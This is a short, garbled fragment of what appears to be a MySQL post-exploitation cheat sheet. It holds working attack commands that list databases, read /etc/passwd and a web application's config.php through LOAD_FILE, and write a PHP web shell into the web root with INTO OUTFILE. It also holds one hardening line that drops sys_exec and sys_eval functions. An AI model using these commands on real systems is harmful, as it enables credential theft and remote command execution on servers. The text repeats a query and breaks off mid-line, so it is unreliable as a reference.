-- All databases SELECT schema_name FROM information_schema.schemata;
-- Read sensitive files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.php'); -- Write webshell (needs secure_file_priv = "") SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"; Once logged in, gather intel: mysql hacktricks
-- Remove dangerous UDFs DROP FUNCTION IF EXISTS sys_exec; DROP FUNCTION IF EXISTS sys_eval; -- All databases SELECT schema_name FROM information_schema